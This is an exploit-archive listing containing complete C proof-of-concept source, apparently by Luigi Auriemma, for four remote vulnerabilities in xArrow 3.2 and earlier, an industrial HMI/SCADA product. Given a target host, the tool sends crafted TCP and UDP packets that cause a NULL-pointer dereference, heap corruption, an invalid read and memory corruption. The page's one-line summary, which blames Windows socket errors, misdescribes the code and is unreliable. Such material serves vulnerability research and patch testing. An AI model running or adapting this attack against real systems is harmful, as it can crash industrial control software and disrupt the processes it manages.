xArrow <= 3.2 multiple vulnerabilities

🗓️ 01 Jul 2012 00:00:00Reported by Luigi AuriemmaType
zdt🔗 0day.today👁 37 Views
There are multiple vulnerabilities in xArrow <= 3.2 related to errors in Windows socket operations and Winsock DLL version out of rang
-------------
  winerr.h
-------------

/*
   Header file used for manage errors in Windows
   It support socket and errno too
   (this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>



void std_err(void) {
    char    *error;

    switch(WSAGetLastError()) {
        case 10004: error = "Interrupted system call"; break;
        case 10009: error = "Bad file number"; break;
        case 10013: error = "Permission denied"; break;
        case 10014: error = "Bad address"; break;
        case 10022: error = "Invalid argument (not bind)"; break;
        case 10024: error = "Too many open files"; break;
        case 10035: error = "Operation would block"; break;
        case 10036: error = "Operation now in progress"; break;
        case 10037: error = "Operation already in progress"; break;
        case 10038: error = "Socket operation on non-socket"; break;
        case 10039: error = "Destination address required"; break;
        case 10040: error = "Message too long"; break;
        case 10041: error = "Protocol wrong type for socket"; break;
        case 10042: error = "Bad protocol option"; break;
        case 10043: error = "Protocol not supported"; break;
        case 10044: error = "Socket type not supported"; break;
        case 10045: error = "Operation not supported on socket"; break;
        case 10046: error = "Protocol family not supported"; break;
        case 10047: error = "Address family not supported by protocol family"; break;
        case 10048: error = "Address already in use"; break;
        case 10049: error = "Can't assign requested address"; break;
        case 10050: error = "Network is down"; break;
        case 10051: error = "Network is unreachable"; break;
        case 10052: error = "Net dropped connection or reset"; break;
        case 10053: error = "Software caused connection abort"; break;
        case 10054: error = "Connection reset by peer"; break;
        case 10055: error = "No buffer space available"; break;
        case 10056: error = "Socket is already connected"; break;
        case 10057: error = "Socket is not connected"; break;
        case 10058: error = "Can't send after socket shutdown"; break;
        case 10059: error = "Too many references, can't splice"; break;
        case 10060: error = "Connection timed out"; break;
        case 10061: error = "Connection refused"; break;
        case 10062: error = "Too many levels of symbolic links"; break;
        case 10063: error = "File name too long"; break;
        case 10064: error = "Host is down"; break;
        case 10065: error = "No Route to Host"; break;
        case 10066: error = "Directory not empty"; break;
        case 10067: error = "Too many processes"; break;
        case 10068: error = "Too many users"; break;
        case 10069: error = "Disc Quota Exceeded"; break;
        case 10070: error = "Stale NFS file handle"; break;
        case 10091: error = "Network SubSystem is unavailable"; break;
        case 10092: error = "WINSOCK DLL Version out of range"; break;
        case 10093: error = "Successful WSASTARTUP not yet performed"; break;
        case 10071: error = "Too many levels of remote in path"; break;
        case 11001: error = "Host not found"; break;
        case 11002: error = "Non-Authoritative Host not found"; break;
        case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
        case 11004: error = "Valid name, no data record of requested type"; break;
        default: error = strerror(errno); break;
    }
    fprintf(stderr, "\nError: %s\n", error);
    exit(1);
}

-------------
 xarrow_1.c
-------------

/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <zlib.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      8192    // max for recvfrom
#define MAXZIPLEN(n)((n)+(((n)/1000)+1)+12)



int create_socket(int type, struct sockaddr_in *peer);
int xarrow_send_header(int sd, u32 zsize, u32 size);
int xarrow_send(int sd, u8 *buff, u32 size);
int xarrow_recv(int sd, u8 *buff, u32 buffsz);
int tcp_recv(int sd, u8 *buff, int len);
int putmm(u8 *data, u8 *mem, int len);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            bug,
            len;
    u16     port    = 1975;
    u8      *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "xArrow <= 3.2 multiple vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            "1 = decompression NULL pointer\n"
            "2 = heap corruption\n"
            "3 = invalid read access (udp port %d)\n"
            "4 = memory corruption (udp port %d)\n"
            "\n", argv[0], port,
            port - 1,
            port - 1);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(bug == 1) {
        sd = create_socket(IPPROTO_TCP, &peer);

        if(xarrow_send_header(sd, -1, 100) < 0) goto quit;

        p = buff;
        p += putcc(p, 'a', 100);
        if(send(sd, buff, p - buff, 0) < 0) goto quit;

    } else if(bug == 2) {
        sd = create_socket(IPPROTO_TCP, &peer);

        for(i = 0; i < 200; i++) {
            if(xarrow_send(sd, NULL, 0) < 0) goto quit;
        }

    } else if(bug == 3) {
        peer.sin_port = htons(ntohs(peer.sin_port) - 1);
        sd = create_socket(IPPROTO_UDP, &peer);

        p = buff;
        p += putxx(p, 0xffffffff,   32);
        p += putcc(p, 0,            6);
        p += putxx(p, !0,           32);
        p += putxx(p, 4,            16);
        p += putxx(p, 1,            16);
        p += putcc(p, 0,            20);
        p += putxx(p, 0x7f000001,   32);    // 127.0.0.1, needed!
        p += putcc(p, 0,            10);
        p += putxx(p, 0xfffd,       16);    // ((num << 4) + 0x20) & 0xffff
        p += putcc(p, 0,            64);

        printf("- send %d bytes\n", p - buff);
        for(i = 0; i < 3; i++) {
            if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();
        }
        goto quit;

    } else if(bug == 4) {
        peer.sin_port = htons(ntohs(peer.sin_port) - 1);
        sd = create_socket(IPPROTO_UDP, &peer);

        // all fields set to zero because they are not necessary
        p = buff;
        p += putxx(p, 0,            32);
        p += putcc(p, 0,            6);
        p += putxx(p, !0,           32);
        p += putxx(p, 4,            16);
        p += putxx(p, 1,            16);
        p += putcc(p, 0,            20);
        p += putxx(p, 0x7f000001,   32);    // 127.0.0.1, needed!
        p += putcc(p, 0,            10);
        p += putxx(p, 0,            16);
        p += putcc(p, 0,            BUFFSZ - (p - buff));
        putxx(buff, (p - buff) - 0x16, 32); // correct size

        printf("- send %d bytes\n", p - buff);
        for(i = 0; i < 3; i++) {
            if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();
        }
        goto quit;

    } else {
        printf("\nError: invalid bug number (%d)\n", bug);
        exit(1);
    }

    for(;;) {
        len = xarrow_recv(sd, buff, BUFFSZ);
        if(len < 0) goto quit;
    }

quit:
    printf("- done\n");
    close(sd);
    return(0);
}



int create_socket(int type, struct sockaddr_in *peer) {
    static struct linger ling = {1,1};
    static int  on  = 1;
    int     sd;

    if(type == IPPROTO_TCP) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        printf("- connected\n");
    } else {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
    }
    setsockopt(sd, SOL_SOCKET, SO_LINGER,    (char *)&ling, sizeof(ling));
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on,   sizeof(on));
    setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on,   sizeof(on));
    return(sd);
}



int xarrow_send_header(int sd, u32 zsize, u32 size) {
    int     i;
    u8      header[6 + 12],
            *p;

    p = header;
    for(i = 0; i < 3; i++) {
        *p++ = 0xeb;
        *p++ = 0x90;
    }
    p += putxx(p, zsize,        32);
    p += putxx(p, size,         32);
    p += putxx(p, 0xeb90d709,   32);
    for(i = 6; i < sizeof(header); i++) {
        header[i] ^= 0x50 ^ 0x65 ^ 0x69;    // yeah 0x5c
    }
    if(send(sd, header, sizeof(header), 0) != sizeof(header)) return(-1);
    return(0);
}



int xarrow_send(int sd, u8 *buff, u32 size) {
    static  u8  *zbuff = NULL;
    uLongf  zsize;

    zsize = MAXZIPLEN(size);
    zbuff = realloc(zbuff, zsize);
    if(!zbuff) std_err();
    //if(!buff || !size) // compress it anyway!
    if(compress2(zbuff, &zsize, buff, size, 9) != Z_OK) return(-1);
    if(xarrow_send_header(sd, zsize, size) < 0) return(-1);
    if(send(sd, zbuff, zsize, 0) != zsize) return(-1);
    printf("- %u -> %u bytes sent\n", size, (u32)zsize);
    return(0);
}



int xarrow_recv(int sd, u8 *buff, u32 buffsz) {
    static  u8  *zbuff = NULL;
    uLongf  tmp;
    u32     zsize,
            size,
            type;
    int     i;
    u8      header[6 + 12],
            *p;

    if(tcp_recv(sd, header, sizeof(header)) < 0) return(-1);
    p = header;
    for(i = 0; i < 3; i++) {
        if(*p != 0xeb) return(-2);  p++;
        if(*p != 0x90) return(-3);  p++;
    }
    for(i = 6; i < sizeof(header); i++) {
        header[i] ^= 0x5c;
    }
    p += getxx(p, &zsize,   32);
    p += getxx(p, &size,    32);
    p += getxx(p, &type,    32);
    if(type == 0xeb90d709) {
        if(zsize > buffsz) return(-4);
        zbuff = realloc(zbuff, zsize);
        if(!zbuff) std_err();
        if(tcp_recv(sd, zbuff, zsize) < 0) return(-5);
        tmp = size;
        if(uncompress(buff, &tmp, zbuff, zsize) != Z_OK) return(-6);
    } else {    // in reality here it gets just rejected
        if(size > buffsz) return(-4);
        if(tcp_recv(sd, buff, size) < 0) return(-5);
    }
    printf("- %u -> %u bytes received\n", zsize, size);
    return(size);
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     t;
    u8      *p;

    for(p = buff; len; p += t, len -= t) {
        if(timeout(sd, 5) < 0) return(-1);
        t = recv(sd, p, len, 0);
        if(t <= 0) return(-1);
    }
    return(0);
}



int putmm(u8 *data, u8 *mem, int len) {
    if(len < 0) len = strlen(mem) + 1;
    memcpy(data, mem, len);
    return(len);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }
    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



#  0day.today [2018-01-04]  #
01 Jul 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8